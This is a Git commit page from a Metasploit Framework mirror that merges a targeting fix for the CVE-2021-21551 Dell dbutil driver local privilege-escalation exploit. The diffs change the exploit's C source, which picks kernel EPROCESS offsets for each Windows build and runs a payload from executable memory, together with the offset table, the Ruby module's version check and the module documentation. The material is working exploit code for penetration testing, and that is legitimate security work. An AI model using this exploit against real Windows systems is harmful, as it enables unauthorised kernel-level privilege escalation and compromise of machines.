github
/
metasploit-framework
mirror of https://github.com/rapid7/metasploit-framework
1
Fork 0
Code Releases Activity

Land #15216, Fix targeting for CVE-2021-21551 

Merge branch 'land-15216' into upstream-master
This commit is contained in:
bwatters 2021-05-21 14:56:08 -05:00
parent a194810ce1 78d47b11f2
commit 8e1391f098
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
5 changed files with 33 additions and 33 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

BIN
data/exploits/CVE-2021-21551/CVE-2021-21551.x64.dll
View File

Binary file not shown.

2
documentation/modules/exploit/windows/local/cve_2021_21551_dbutil_memmove.md
View File

@ -7,7 +7,7 @@ read and write kernel-mode memory.
* Windows 7 SP0 x64
* Windows 7 SP1 x64
* Windows 8.1 x64
* Windows 10 x64 v1607 - v2009 (20H2)
* Windows 10 x64 v1607 - 21H1 (builds 14393 - 19043)
* Windows Server 2016 x64
* Windows Server 2019 x64

52
external/source/exploits/CVE-2021-21551/exploit.c vendored
View File

@ -8,6 +8,8 @@ fNtQuerySystemInformation NtQuerySystemInformation = NULL;
fRtlGetNtVersionNumbers RtlGetNtVersionNumbers = NULL;
void ExecutePayload(PMSF_PAYLOAD pMsfPayload) {
if (!pMsfPayload)
return;
PVOID pPayload = VirtualAlloc(NULL, pMsfPayload->dwSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (!pPayload)
return;
@ -35,6 +37,7 @@ BOOL ResolveRequirements(void) {
DWORD dwMajor, dwMinor, dwBuild;
RtlGetNtVersionNumbers(&dwMajor, &dwMinor, &dwBuild);
dwBuild = LOWORD(dwBuild);
dprintf("[*] Windows version: %u.%u.%u", dwMajor, dwMinor, dwBuild);
if ((dwMajor == 6) && (dwMinor == 1) && (dwBuild == 7600)) {
g_pEprocessOffsets = &EprocessOffsetsWin7Sp0;
@ -45,32 +48,29 @@ BOOL ResolveRequirements(void) {
else if ((dwMajor == 6) && (dwMinor == 3) && (dwBuild == 9600)) {
g_pEprocessOffsets = &EprocessOffsetsWin8p1;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 14393)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 15063)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 16299)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17134)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 17763)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1809;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 19041)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
}
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild == 18362)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
/* targets for Windows 10 v1607 - 21H1 */
else if ((dwMajor == 10) && (dwMinor == 0) && (dwBuild >= 14393) && (dwBuild <= 19043)) {
if ((dwBuild < 15063)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1607;
}
else if ((dwBuild < 16299)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1703;
}
else if ((dwBuild < 17134)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1709;
}
else if ((dwBuild < 17763)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1803;
}
else if ((dwBuild < 18362)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1809;
}
else if ((dwBuild < 19041)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v1903;
}
else if ((dwBuild <= 19043)) {
g_pEprocessOffsets = &EprocessOffsetsWin10v2004;
}
}
else {
return FALSE;

8
external/source/include/windows/common.h vendored
View File

@ -47,9 +47,9 @@ const static EPROCESS_OFFSETS EprocessOffsetsWin8p1 = { 0x2e8, 0x348, 0x2e0 };
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1607 = { 0x2f0, 0x358, 0x2e8 };
/* Windows 10 v1703 (10.0.15063) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1703%20Redstone%202%20(Creators%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1703 = { 0x2e8, 0x358, 0x2e0 };
/* Windows 10 v1709 (10.0.16299) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1709%20Redstone%203%20(Fall%20Creators%20Update */
/* Windows 10 v1709 (10.0.16299) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1709%20Redstone%203%20(Fall%20Creators%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1709 = { 0x2e8, 0x358, 0x2e0 };
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS*/
/* Windows 10 v1803 (10.0.17134) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1803%20Redstone%204%20(Spring%20Creators%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1803 = { 0x2e8, 0x358, 0x2e0 };
/* Windows 10 v1809 (10.0.17763) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1809%20Redstone%205%20(October%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1809 = { 0x2e8, 0x358, 0x2e0 };
@ -57,9 +57,9 @@ const static EPROCESS_OFFSETS EprocessOffsetsWin10v1809 = { 0x2e8, 0x358, 0x2e0
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1903 = { 0x2f0, 0x360, 0x2e8 };
/* Windows 10 v1909 (10.0.18362) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/1909%2019H2%20(November%202019%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v1909 = { 0x2f0, 0x360, 0x2e8 };
/* Windows 10 v2004 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2004%2020H1%20(May%202020%20Update)/_EPROCESS */
/* Windows 10 v2004 / 20H1 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2004%2020H1%20(May%202020%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v2004 = { 0x448, 0x4b8, 0x440 };
/* Windows 10 v2009 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2009%2020H2%20(October%202020%20Update)/_EPROCESS */
/* Windows 10 v2009 / 20H2 (10.0.19041) - https://www.vergiliusproject.com/kernels/x64/Windows%2010%20%7C%202016/2009%2020H2%20(October%202020%20Update)/_EPROCESS */
const static EPROCESS_OFFSETS EprocessOffsetsWin10v2009 = { 0x448, 0x4b8, 0x440 };
#endif

4
modules/exploits/windows/local/cve_2021_21551_dbutil_memmove.rb
View File

@ -87,8 +87,8 @@ class MetasploitModule < Msf::Exploit::Local
return true if sysinfo_value =~ /Windows 7/ && ((build_num == 7600) || (build_num == 7601))
return true if sysinfo_value =~ /Windows 8\.1/ && (build_num == 9600)
return true if sysinfo_value =~ /Windows 10/ && (build_num >= 14393 && build_num <= 19042)
return true if sysinfo_value =~ /Windows 2016/ && (build_num >= 14393 && build_num <= 19042)
return true if sysinfo_value =~ /Windows 10/ && (build_num >= 14393 && build_num <= 19043)
return true if sysinfo_value =~ /Windows 2016/ && (build_num >= 14393 && build_num <= 19043)
false
end